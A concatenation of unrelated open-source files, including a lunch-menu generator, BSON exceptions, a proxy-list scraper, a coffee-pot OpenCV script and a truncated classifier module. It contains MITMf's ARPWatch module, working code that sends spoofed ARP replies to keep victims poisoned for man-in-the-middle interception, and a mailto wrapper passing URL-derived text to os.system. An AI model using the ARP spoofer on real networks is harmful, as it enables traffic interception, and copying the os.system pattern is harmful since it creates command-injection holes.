4.0 -1.2687 0.1000 -0.2550 2.996 4.1840 6.1600 0.4893 0.0512 0.0860 0.7900 1.5005 -0.3218 -0.00804 -0.00785 -0.4417 -0.1417 -0.007010 0.102151 0.2289 0.014996 580.0 0.0700 0.3437 0.2637 0.4458 0.3459 0.8000 0.0663 0.020 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.2515 0.1000 -0.2550 3.292 4.1879 6.1580 0.4892 0.0512 0.0860 0.8129 1.5028 -0.3323 -0.00811 -0.00792 -0.4340 -0.1364 -0.007279 0.108360 0.2289 0.014996 580.0 0.0699 0.3471 0.2671 0.4458 0.3459 0.8000 0.0663 0.030 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.1744 0.1000 -0.2550 3.514 4.1556 6.1550 0.4890 0.0511 0.0860 0.8439 1.5071 -0.3394 -0.00839 -0.00819 -0.4177 -0.1403 -0.007354 0.119888 0.2289 0.014996 580.0 0.0701 0.3603 0.2803 0.4535 0.3537 0.8000 0.0663 0.040 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.0671 0.1000 -0.2550 3.563 4.1226 6.1508 0.4888 0.0508 0.0860 0.8740 1.5138 -0.3453 -0.00875 -0.00855 -0.4000 -0.1591 -0.006977 0.133641 0.2289 0.014996 579.9 0.0702 0.3718 0.2918 0.4589 0.3592 0.8000 0.0663 0.050 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.9464 0.1000 -0.2550 3.547 4.1011 6.1441 0.4884 0.0504 0.0860 0.8996 1.5230 -0.3502 -0.00912 -0.00891 -0.3903 -0.1862 -0.006467 0.148927 0.2290 0.014996 579.9 0.0701 0.3848 0.3048 0.4630 0.3635 0.8000 0.0663 0.075 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.7051 0.1000 -0.2540 3.448 4.0860 6.1200 0.4872 0.0495 0.0860 0.9442 1.5597 -0.3579 -0.00973 -0.00950 -0.4040 -0.2538 -0.005734 0.190596 0.2292 0.014996 579.6 0.0686 0.3878 0.3129 0.4702 0.3713 0.8000 0.0663 0.10 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.5747 0.1000 -0.2530 3.312 4.1030 6.0850 0.4854 0.0489 0.0860 0.9677 1.6104 -0.3604 -0.00975 -0.00952 -0.4423 -0.2943 -0.005604 0.230662 0.2297 0.014996 579.2 0.0646 0.3835 0.3152 0.4747 0.3769 0.8000 0.0663 0.15 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.5309 0.1000 -0.2500 3.044 4.1717 5.9871 0.4808 0.0479 0.0860 0.9660 1.7549 -0.3565 -0.00883 -0.00862 -0.5162 -0.3113 -0.005845 0.266468 0.2326 0.014988 577.2 0.0494 0.3719 0.3128 0.4798 0.3847 0.8000 0.0612 0.20 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.6352 0.1000 -0.2449 2.831 4.2476 5.8699 0.4755 0.0471 0.0860 0.9334 1.9157 -0.3470 -0.00778 -0.00759 -0.5697 -0.2927 -0.006141 0.255253 0.2386 0.014964 573.9 -0.0019 0.3601 0.3076 0.4816 0.3902 0.8000 0.0530 0.25 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.7766 0.1000 -0.2382 2.658 4.3184 5.7547 0.4706 0.0464 0.0860 0.8946 2.0709 -0.3379 -0.00688 -0.00671 -0.6109 -0.2662 -0.006439 0.231541 0.2497 0.014881 568.5 -0.0479 0.3522 0.3047 0.4815 0.3946 0.7999 0.0457 0.30 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.9278 0.0999 -0.2313 2.505 4.3844 5.6527 0.4665 0.0458 0.0860 0.8590 2.2005 -0.3314 -0.00612 -0.00598 -0.6444 -0.2405 -0.006704 0.207277 0.2674 0.014639 560.5 -0.0756 0.3438 0.3005 0.4801 0.3981 0.7997 0.0398 0.40 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.2176 0.0997 -0.2146 2.261 4.4979 5.4997 0.4607 0.0445 0.0850 0.8019 2.3886 -0.3256 -0.00498 -0.00486 -0.6931 -0.1975 -0.007125 0.165464 0.3120 0.013493 540.0 -0.0960 0.3351 0.2984 0.4758 0.4036 0.7988 0.0312 0.50 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.4695 0.0991 -0.1972 2.087 4.5881 5.4029 0.4571 0.0429 0.0830 0.7578 2.5000 -0.3189 -0.00420 -0.00410 -0.7246 -0.1633 -0.007435 0.133828 0.3610 0.011133 512.9 -0.0998 0.3353 0.3036 0.4710 0.4079 0.7966 0.0255 0.75 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.9278 0.0936 -0.1620 1.812 4.7571 5.2900 0.4531 0.0387 0.0690 0.6788 2.6224 -0.2702 -0.00308 -0.00301 -0.7708 -0.1028 -0.008120 0.085153 0.4353 0.006739 441.9 -0.0765 0.3429 0.3205 0.4621 0.4157 0.7792 0.0175 1.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -2.2453 0.0766 -0.1400 1.648 4.8820 5.2480 0.4517 0.0350 0.0450 0.6196 2.6690 -0.2059 -0.00246 -0.00241 -0.7990 -0.0699 -0.008444 0.058595 0.4629 0.005749 391.8 -0.0412 0.3577 0.3419 0.4581 0.4213 0.7504 0.0133 1.5 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -2.7307 0.0022 -0.1184 1.511 5.0697 5.2194 0.4507 0.0280 0.0134 0.5101 2.6985 -0.0852 -0.00180 -0.00176 -0.8382 -0.0425 -0.007707 0.031787 0.4756 0.005544 348.1 0.0140 0.3769 0.3703 0.4493 0.4213 0.7136 0.0090 2.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -3.1413 -0.0591 -0.1100 1.470 5.2173 5.2099 0.4504 0.0213 0.0040 0.3917 2.7085 0.0160 -0.00147 -0.00143 -0.8663 -0.0302 -0.004792 0.019716 0.4785 0.005521 332.5 0.0544 0.4023 0.4023 0.4459 0.4213 0.7035 0.0068 3.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -3.7413 -0.0931 -0.1040 1.456 5.4385 5.2040 0.4501 0.0106 0.0010 0.1244 2.7145 0.1876 -0.00117 -0.00115 -0.9032 -0.0129 -0.001828 0.009643 0.4796 0.005517 324.1 0.1232 0.4406 0.4406 0.4433 0.4213 0.7006 0.0045 4.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -4.1814 -0.0982 -0.1020 1.465 5.5977 5.2020 0.4501 0.0041 0.0000 0.0086 2.7164 0.3378 -0.00107 -0.00104 -0.9231 -0.0016 -0.001523 0.005379 0.4799 0.005517 321.7 0.1859 0.4784 0.4784 0.4424 0.4213 0.7001 0.0034 5.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -4.5187 -0.0994 -0.1010 1.478 5.7276 5.2010 0.4500 0.0010 0.0000 0.0000 2.7172 0.4579 -0.00102 -0.00099 -0.9222 0.0000 -0.001440 0.003223 0.4799 0.005517 320.9 0.2295 0.5074 0.5074 0.4420 0.4213 0.7000 0.0027 7.5 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -5.1224 -0.0999 -0.1010 1.498 5.9891 5.2000 0.4500 0.0000 0.0000 0.0000 2.7177 0.7514 -0.00096 -0.00094 -0.8346 0.0000 -0.001369 0.001134 0.4800 0.005517 320.3 0.2660 0.5328 0.5328 0.4416 0.4213 0.7000 0.0018 10.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -5.5872 -0.1000 -0.1000 1.502 6.1930 5.2000 0.4500 0.0000 0.0000 0.0000 2.7180 1.1856 -0.00094 -0.00091 -0.7332 0.0000 -0.001361 0.000515 0.4800 0.005517 320.1 0.2682 0.5542 0.5542 0.4414 0.4213 0.7000 0.0014 """)
ROB-Seismology/oq-hazardlib
openquake/hazardlib/gsim/chiou_youngs_2008.py
Python
agpl-3.0
14,566
#!/usr/bin/env python3 # Copyright (c) 2014-2021, Linus Östberg and contributors # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of kimenu nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ Main script for choosing what restaurant parsers to use. """ import json import os import sys import parser as ps __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) REST_FILENAME = os.path.join(__location__, "restaurants.json") def read_restaurants(intext: str) -> dict: """ Parse the list of restaurants from the restaurants file. Args: intext(str): The text loaded from the restaurants file. """ indata = json.loads(intext) data = dict() for entry in indata["restaurants"]: data[entry["identifier"]] = entry return data REST_DATA = read_restaurants(open(REST_FILENAME).read()) # works as ordered dict as well, but must be _ordered_ MAPPER = { "jorpes": ps.parse_jorpes, "glada": ps.parse_glada, "haga": ps.parse_haga, "hjulet": ps.parse_hjulet, "jons": ps.parse_jons, "livet": ps.parse_livet, "nanna": ps.parse_nanna, "svarta": ps.parse_svarta, "bikupan": ps.parse_bikupan, "dufva": ps.parse_dufva, "hubben": ps.parse_hubben, "rudbeck": ps.parse_rudbeck, "tallrik": ps.parse_tallrik, } KI = ("jorpes", "glada", "haga", "hjulet", "jons", "livet", "nanna", "svarta") UU = ("bikupan", "dufva", "hubben", "rudbeck", "tallrik") def activate_parsers(restaurants, restaurant_data): """ Run the wanted parsers """ output = [] for restaurant in restaurants: data = MAPPER[restaurant](restaurant_data[restaurant]) output.append( f"""<div class="title"><a href="{data['url']}">{data['title']}</a>""" ) output.append(f"""(<a href="{data['map_url']}">{data['location']}</a>)</div>""") if "menu" in data: output.append('<div class="menu">') output.append("<p>") output.append("<br />\n".join(data["menu"])) output.append("</p>") output.append("</div>") return "\n".join(output) def get_restaurant(name: str) -> dict: """ Request the menu of a restaurant """ if name in MAPPER: return MAPPER[name](REST_DATA[name]) else: return {} def list_restaurants(): """ List all supported restaurants. """ return list(REST_DATA.values()) def page_end(): """ Print the closure of tags etc """ lines = list() lines.append( '<div class="endnote">Code available at ' + '<a href="https://github.com/talavis/lunch-menu">' + "Github</a>. Patches are very welcome.</div>" ) lines.append("</body>") lines.append("</html>") return lines def page_start(weekday, day, month): """ Print the initialisation of the page """ lines = list() lines.append("<html>") lines.append("<head>") date = weekday.capitalize() + " " + str(day) + " " + str(month) lines.append("<title>Dagens mat - {}</title>".format(date)) lines.append('<link href="styles.css" rel="stylesheet" type="text/css">') lines.append('<style type="text/css"></style>') lines.append("</head>") lines.append("<body>") # page formatting lines.append("") return lines def parse_restaurant_names(rest_names): """ Decide what restaurants to generate menus for """ restaurants = list() for param in rest_names: if param not in KI and param not in UU: raise ValueError("{} not a valid restaurant".format(param)) restaurants.append(param.lower()) return restaurants def print_usage(supported): """ Print description of syntax """ sys.stderr.write("Usage: {} restaurant1 [...] \n".format(sys.argv[0])) sys.stderr.write("Supported restaurants: {}\n".format(", ".join(sorted(supported)))) sys.stderr.write("Write all to generate all supported restaurants\n") def gen_ki_menu(): """ Generate a menu for restaurants at KI """ output = "" output += "\n".join(page_start(ps.get_weekday(), str(ps.get_day()), ps.get_month())) output += activate_parsers(KI, REST_DATA) output += "\n".join(page_end()) return output def gen_uu_menu(): """ Generate a menu for restaurants at UU """ output = "" output += "\n".join(page_start(ps.get_weekday(), str(ps.get_day()), ps.get_month())) output += activate_parsers(UU, REST_DATA) output += "\n".join(page_end()) sys.stderr.write(output + "\n") return output if __name__ == "__main__": if len(sys.argv) < 2 or "-h" in sys.argv: print_usage(KI + UU) sys.exit() REST_NAMES_IN = tuple() if "all" in sys.argv[1:]: REST_NAMES_IN += KI + UU elif "ki" in sys.argv[1:]: REST_NAMES_IN += KI elif "uu" in sys.argv[1:]: REST_NAMES_IN += UU else: REST_NAMES_IN = [param for param in sys.argv[1:] if param != "-r"] try: REST_NAMES = parse_restaurant_names(REST_NAMES_IN) except ValueError as err: sys.stderr.write("E: {}\n".format(err)) print_usage((x for x in MAPPER)) sys.exit(1) # print the menus print("\n".join(page_start(ps.get_weekday(), str(ps.get_day()), ps.get_month()))) print(activate_parsers(REST_NAMES, REST_DATA)) print("\n".join(page_end()))
talavis/kimenu
backend/main.py
Python
bsd-3-clause
6,810
# Copyright 2009-2010 10gen, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Exceptions raised by the BSON package.""" class BSONError(Exception): """Base class for all BSON exceptions. """ class InvalidBSON(BSONError): """Raised when trying to create a BSON object from invalid data. """ class InvalidStringData(BSONError): """Raised when trying to encode a string containing non-UTF8 data. """ class InvalidDocument(BSONError): """Raised when trying to create a BSON object from an invalid document. """ class InvalidId(BSONError): """Raised when trying to create an ObjectId from invalid data. """
couchbaselabs/litmus
lib/bson/errors.py
Python
apache-2.0
1,154
## Copyright 2003-2009 Luc Saffre ## This file is part of the TimTools project. ## TimTools is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 3 of the License, or ## (at your option) any later version. ## TimTools is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## You should have received a copy of the GNU General Public License ## along with TimTools; if not, see <http://www.gnu.org/licenses/>. """ Wrapper to convert the `mailto` syntax (as used by browsers to call an external mail client) to Mozilla's "-compose" command-line syntax. Workaround for http://bugzilla.mozilla.org/show_bug.cgi?id=220306 USAGE: timtools mailtomoz MOZILLA MAILTO Where: MOZILLA is the filename including path of your mozilla.exe MAILTO is a string of the form:: mailto:[email protected]?subject=bla,body=blabla mailtomoz will then do the following system call:: MOZILLA -compose [email protected],subject=bla,body=blabla To use this script, you must edit your registry and modify the value of `HKEY_CLASSES_ROOT\mailto\shell\open\command` to something like:: timtools mailtomoz "C:\Program files\mozilla.org\mozilla.exe" "%1" # or "C:\Programme\mozilla.org\Mozilla\mozilla.exe " When bug 220306 is fixed, change this entry back to:: C:\Programme\mozilla.org\Mozilla\mozilla.exe -mail %1 See also `openmail <openmail.html>`_. """ import sys,os import urllib from timtools.ui.console import confirm if __name__ == '__main__': mozilla = sys.argv[1] mailto = sys.argv[2] l = mailto.split(":",2) assert len(l) == 2 assert l[0] == "mailto" #assert arg.startswith("mailto:") subject = None body = None l = l[1].split("?",2) assert len(l) >= 1 to = urllib.unquote(l[0]) if len(l) == 2: l = l[1].split('&') for i in l: name,value = i.split('=') if name.lower() == 'subject': subject = urllib.unquote(value.strip()) elif name.lower() == 'body': body = urllib.unquote(value.strip()) args = 'to=%s' % to if subject: args += ',subject=%s' % subject if body: body = body.replace('\n','\\n') body = body.replace('"','\\"') args += ',body=%s' % body cmd = mozilla + ' -compose "%s"' % args print cmd if not confirm("okay"): raise "not ok" os.system(cmd)
lsaffre/timtools
timtools/scripts/mailtomoz.py
Python
bsd-2-clause
2,745
from django.contrib import admin from rcs.wiki.models import WikiPage, WikiAttachment admin.site.register(WikiPage) admin.site.register(WikiAttachment)
ShuffleBox/django-rcsfield
rcs/wiki/admin.py
Python
bsd-3-clause
152
import logging import os import sys import threading from scapy.all import * from core.utils import shutdown mitmf_logger = logging.getLogger('mitmf') class ARPWatch: def __init__(self, gatewayip, myip, interface): self.gatewayip = gatewayip self.gatewaymac = None self.myip = myip self.interface = interface self.debug = False self.watch = True def start(self): try: self.gatewaymac = getmacbyip(self.gatewayip) if self.gatewaymac is None: shutdown("[ARPWatch] Error: Could not resolve gateway's MAC address") except Exception, e: shutdown("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e)) mitmf_logger.debug("[ARPWatch] gatewayip => {}".format(self.gatewayip)) mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac)) mitmf_logger.debug("[ARPWatch] myip => {}".format(self.myip)) mitmf_logger.debug("[ARPWatch] interface => {}".format(self.interface)) t = threading.Thread(name='ARPWatch', target=self.startARPWatch) t.setDaemon(True) t.start() def stop(self): mitmf_logger.debug("[ARPWatch] shutting down") self.watch = False def startARPWatch(self): sniff(prn=self.arp_monitor_callback, filter="arp", store=0) def arp_monitor_callback(self, pkt): if self.watch is True: #Prevents sending packets on exiting if ARP in pkt and pkt[ARP].op == 1: #who-has only #broadcast mac is 00:00:00:00:00:00 packet = None #print str(pkt[ARP].hwsrc) #mac of sender #print str(pkt[ARP].psrc) #ip of sender #print str(pkt[ARP].hwdst) #mac of destination (often broadcst) #print str(pkt[ARP].pdst) #ip of destination (Who is ...?) if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)): mitmf_logger.debug("[ARPWatch] {} is asking where the Gateway is. Sending reply: I'm the gateway biatch!'".format(pkt[ARP].psrc)) #send repoison packet packet = ARP() packet.op = 2 packet.psrc = self.gatewayip packet.hwdst = str(pkt[ARP].hwsrc) packet.pdst = str(pkt[ARP].psrc) elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)): mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: I'm {} biatch!".format(pkt[ARP].pdst, pkt[ARP].pdst)) #send repoison packet packet = ARP() packet.op = 2 packet.psrc = self.gatewayip packet.hwdst = '00:00:00:00:00:00' packet.pdst = str(pkt[ARP].pdst) elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)): mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: This is the h4xx0r box!".format(pkt[ARP].pdst)) packet = ARP() packet.op = 2 packet.psrc = self.myip packet.hwdst = str(pkt[ARP].hwsrc) packet.pdst = str(pkt[ARP].psrc) try: if packet is not None: send(packet, verbose=self.debug, iface=self.interface) except Exception, e: mitmf_logger.error("[ARPWatch] Error sending re-poison packet: {}".format(e)) pass
0x27/MITMf
core/poisoners/arp/ARPWatch.py
Python
gpl-3.0
3,878
#!/usr/bin/env python # This example script was ported from Perl Spreadsheet::WriteExcel module. # The author of the Spreadsheet::WriteExcel module is John McNamara # <[email protected]> __revision__ = """$Id: cgi.py,v 1.1 2004/01/31 18:57:53 fufff Exp $""" ############################################################################### # # Example of how to use the Spreadsheet::WriteExcel module to send an Excel # file to a browser in a CGI program. # # On Windows the hash-bang line should be something like: # #!C:\Perl\bin\perl.exe # # reverse('(c)'), March 2001, John McNamara, [email protected] # import sys import pyXLWriter as xl # Set the filename and send the content type filename = "cgitest.xls" print "Content-type: application/vnd.ms-excel" # The Content-Disposition will generate a prompt to save the file. If you want # to stream the file to the browser, comment out the following line. print "Content-Disposition: attachment; filename=%s" % filename print # Create a new workbook and add a worksheet. The special Perl filehandle - will # redirect the output to STDOUT # workbook = xl.Writer(sys.stdout) worksheet = workbook.add_worksheet() # Set the column width for column 1 worksheet.set_column(0, 20) # Create a format format = workbook.add_format() format.set_bold(); format.set_size(15); format.set_color('blue') # Write to the workbook worksheet.write([0, 0], "Hi Excel!", format) workbook.close()
evgenybf/pyXLWriter
examples/cgi.py
Python
lgpl-2.1
1,436
# coding: utf-8 from __future__ import unicode_literals import Queue import threading class BaseProducer(threading.Thread): def __init__(self, q, name='BasePro', pages=1): super(BaseProducer, self).__init__() self.q = q self.name = name self.pages = pages self.offset = 1 self.url = '' self.type = 0 def run(self): while True: resource = {} resource['url'] = '{0}{1}'.format(self.url, self.offset) resource['type'] = self.type try: self.q.put(resource, block=True, timeout=3) except Queue.Full: pass else: print '{0} now in queue'.format(self.offset) if self.offset < self.pages: self.offset += 1 else: break print '{0} finish produce works'.format(self.name) class XiCiProducer(BaseProducer): def __init__(self, q, name='XiCiPro', pages=713): super(XiCiProducer, self).__init__(q, name, pages) self.type = 1 self.url = 'http://www.xicidaili.com/nn/' class KuaiProducer(BaseProducer): def __init__(self, q, name='KuaiPro', pages=966): super(KuaiProducer, self).__init__(q, name, pages) self.type = 2 self.url = 'http://www.kuaidaili.com/free/inha/' class LiuLiuProducer(BaseProducer): def __init__(self, q, name='LiuLiuPro', pages=1): super(LiuLiuProducer, self).__init__(q, name, pages) self.type = 3 self.url = 'http://www.66ip.cn/nmtq.php?getnum=10000&isp=0&anonymoustype=3&start=&ports=&export=&ipaddress=&area=1&proxytype=0&api=66ip' def run(self): while True: resource = {} resource['url'] = self.url resource['type'] = self.type try: self.q.put(resource, block=True, timeout=3) except Queue.Full: pass else: break print '{0} finish produce works'.format(self.name)
bluedazzle/django-angularjs-blog
app/blog_lab/new_proxy/ProxyProducer.py
Python
bsd-2-clause
2,085
import numpy as np import argparse import glob import cv2 import io import picamera from Twitter import Twitter import onlineCoffee import time def auto_canny(image, sigma=0.33): v = np.median(image) lower = int(max(0, (1.0 - sigma) * v)) upper = int(min(255, (1.0 + sigma) * v)) edged = cv2.Canny(image, lower, upper) return edged def r(image): #image = cv2.imread('2.jpg') gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) blurred = cv2.GaussianBlur(gray, (1,1), 1) wide = cv2.Canny(blurred, 10, 50) tight = cv2.Canny(blurred, 225, 250) auto = auto_canny(blurred) # show the images return wide def houghlines(im,h): #im = cv2.imread('2.jpg') #ret,gray = cv2.threshold(im,40,255,cv2.THRESH_TOZERO_INV) #gray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY) #edges = cv2.Canny(gray,10,200) def getKey(item): return abs(item[1]-item[3]) edges = r(im) lines = cv2.HoughLines(edges,20,np.pi/190,100) horizontal = [] for line in lines: for rho,theta in line: a = np.cos(theta) b = np.sin(theta) x0 = a*rho y0 = b*rho x1 = int(x0 + 1000*(-b)) # Here i have used int() instead of rounding the decimal value, so 3.8 --> 3 y1 = int(y0 + 1000*(a)) # But if you want to round the number, then use np.around() function, then 3.8 --> 4.0 x2 = int(x0 - 1000*(-b)) # But we need integers, so use int() function after that, ie int(np.around(x)) y2 = int(y0 - 1000*(a)) #cv2.line(im,(x1,y1),(x2,y2),(0,255,0),2) #print(str(x1) + " " + str(y1) + " " + str(x2) + " " + str(y2)) horizontal.append((x1,y1,x2,y2)) #cv2.imshow('houghlines',im) #cv2.waitKey(0) #cv2.destroyAllWindows() horizontal = sorted(horizontal,key=getKey) i = 0 votes = 0 while True: cv2.line(im,(horizontal[i][0],horizontal[i][1]),(horizontal[i][2],horizontal[i][3]),(200,0,0),2) average = (horizontal[i][1]+horizontal[i][3])/2.0 percent = average/h actual = 100-(percent*100) if actual > 80: i += 1 print(actual) elif actual < 25: print(actual) votes +=1 i +=1 elif actual <30: print("the coffee pot is getting low " + str(actual) + "% full!") return votes,actual else: print("the coffee pot is " + str(actual) + "% full!") return votes,actual def detect(): stream = io.BytesIO() #Get the picture (low resolution, so it should be quite fast) #Here you can also specify other parameters (e.g.:rotate the image) with picamera.PiCamera() as camera: camera.resolution = (700, 525) camera.capture(stream, format='jpeg') buff = np.fromstring(stream.getvalue(), dtype=np.uint8) #Now creates an OpenCV image img = cv2.imdecode(buff, 1) #img = cv2.imread('coffee.jpg') face_cascade = cv2.CascadeClassifier('/home/pi/Documents/OpenCV_Projects/XML_Files/coffeePot.xml') eye_cascade = cv2.CascadeClassifier('/home/pi/Documents/OpenCV_Projects/XML_Files/liquid.xml') gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) faces = face_cascade.detectMultiScale(gray, 1.2, 500, minSize=(80,100)) for (x,y,w,h) in faces: img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2) roi_gray = gray[y:y+h, x:x+w] roi_color = img[y:y+h, x:x+w] eyes = eye_cascade.detectMultiScale(roi_gray, 1.2, 10, minSize=(70,50)) return houghlines(roi_color,h) while True: percent = 0 votes = 0 t = Twitter() for i in range(0,20): numVotes,numPercent =detect() percent += numPercent votes += numVotes percent /= 20 print("********* UPDATING **********") if votes > 20: onlineCoffee.updateCoffeeSite("We've most likely run out of coffee... I blame Kevin") #t.tweet("We've most likely run out of coffee... I blame Kevin") else: onlineCoffee.updateCoffeeSite("There's plenty of coffee! It's " + str(int(percent)) + "% full!") #t.tweet("There's plenty of coffee! It's " + str(int(percent)) + "% full!") print(votes)
ciauri/CoffeeRobot
MeasureCoffee.py
Python
mit
4,323
""" Class for mass-univariate classification """ from numpy import in1d, zeros, array, size, float64, asarray from thunder.rdds.series import Series class MassUnivariateClassifier(object): """ Base class for performing classification. Assumes a Series with array data such that each entry belongs to one of several categories. Uses independent classifiers to train and predict. Example usage: determining how well each individual neural signal predicts a behavior. Parameters ---------- paramfile : str or dict A Python dictionary, or MAT file, containing parameters for training classifiers. At minimum must contain a "labels" field, with the label to classify at each time point. Can additionally include fields for "features" (which feature was present at each time point) and "samples" (which sample was present at each time point) Attributes ---------- `labels` : array Array containing the label for each time point `features` : array Which feature was present at each time point `nfeatures` : int, optional Number of features `samples` : array Which sample does each time point belong to `sampleIds` : list Unique samples `nsamples` : int Number of samples """ def __init__(self, paramFile): from scipy.io import loadmat if type(paramFile) is str: params = loadmat(paramFile, squeeze_me=True) elif type(paramFile) is dict: params = paramFile else: raise TypeError("Parameters for classification must be provided as string with file location," + " or dictionary") self.labels = params['labels'] if 'features' in params: self.features = params['features'] self.nfeatures = len(list(set(self.features.flatten()))) self.samples = params['samples'] self.sampleIds = list(set(self.samples.flatten())) self.nsamples = len(self.sampleIds) else: self.nfeatures = 1 self.nsamples = len(self.labels) @staticmethod def load(paramFile, classifyMode, **opts): from thunder.utils.common import checkParams checkParams(classifyMode.lower(), CLASSIFIERS.keys()) return CLASSIFIERS[classifyMode.lower()](paramFile, **opts) def get(self, x, featureSet=None): pass def fit(self, data, featureSet=None): """ Run classification on each record in a data set Parameters ---------- data: Series or a subclass (e.g. RowMatrix) Data to perform classification on, must be a collection of key-value pairs where the keys are identifiers and the values are one-dimensional arrays featureset : array, optional, default = None Which features to use Returns ------- perf : Series The performance of the classifer for each record """ if not isinstance(data, Series): raise Exception('Input must be Series or a subclass (e.g. RowMatrix)') if self.nfeatures == 1: perf = data.rdd.mapValues(lambda x: [self.get(x)]) else: if featureSet is None: featureSet = [[self.features[0]]] for i in featureSet: assert array([item in i for item in self.features]).sum() != 0, "Feature set invalid" perf = data.rdd.mapValues(lambda x: asarray(map(lambda j: self.get(x, j), featureSet))) return Series(perf, index=featureSet).__finalize__(data) class GaussNaiveBayesClassifier(MassUnivariateClassifier): """ Classifier for Gaussian Naive Bayes classification. Parameters ---------- paramfile : str or dict Parameters for classification, see MassUnivariateClassifier cv : int Folds of cross-validation, none if 0 """ def __init__(self, paramfile, cv=0): MassUnivariateClassifier.__init__(self, paramfile) from sklearn.naive_bayes import GaussianNB from sklearn import cross_validation self.cvFunc = cross_validation.cross_val_score self.cv = cv self.func = GaussianNB() def get(self, x, featureSet=None): """ Compute classification performance Parameters ---------- x : array Data for a single record featureset : array, optional, default = None Which features to use Returns ------- perf : scalar Performance of the classifier on this record """ y = self.labels if self.nfeatures == 1: X = zeros((self.nsamples, 1)) X[:, 0] = x else: X = zeros((self.nsamples, size(featureSet))) for i in range(0, self.nsamples): inds = (self.samples == self.sampleIds[i]) & (in1d(self.features, featureSet)) X[i, :] = x[inds] if self.cv > 0: return self.cvFunc(self.func, X, y, cv=self.cv).mean() else: ypred = self.func.fit(X, y).predict(X) perf = array(y == ypred).mean() return perf class TTestClassifier(MassUnivariateClassifier): """ Classifier for TTest classification. Parameters ---------- paramfile : str or dict Parameters for classification, see MassUnivariateClassifier """ def __init__(self, paramfile): MassUnivariateClassifier.__init__(self, paramfile) from scipy.stats import ttest_ind self.func = ttest_ind unique = list(set(list(self.labels))) if len(unique) != 2: raise TypeError("Only two types of labels allowed for t-test classificaiton") if unique != set((0, 1)): self.labels = array(map(lambda i: 0 if i == unique[0] else 1, self.labels)) def get(self, x, featureSet=None): """ Compute classification performance as a t-statistic Parameters ---------- x : array Data for a single record featureset : array, optional, default = None Which features to use Returns ------- t : scalar t-statistic for this record """ if (self.nfeatures > 1) & (size(featureSet) > 1): X = zeros((self.nsamples, size(featureSet))) for i in range(0, size(featureSet)): X[:, i] = x[self.features == featureSet[i]] t = float64(self.func(X[self.labels == 0, :], X[self.labels == 1, :])[0]) else: if self.nfeatures > 1: x = 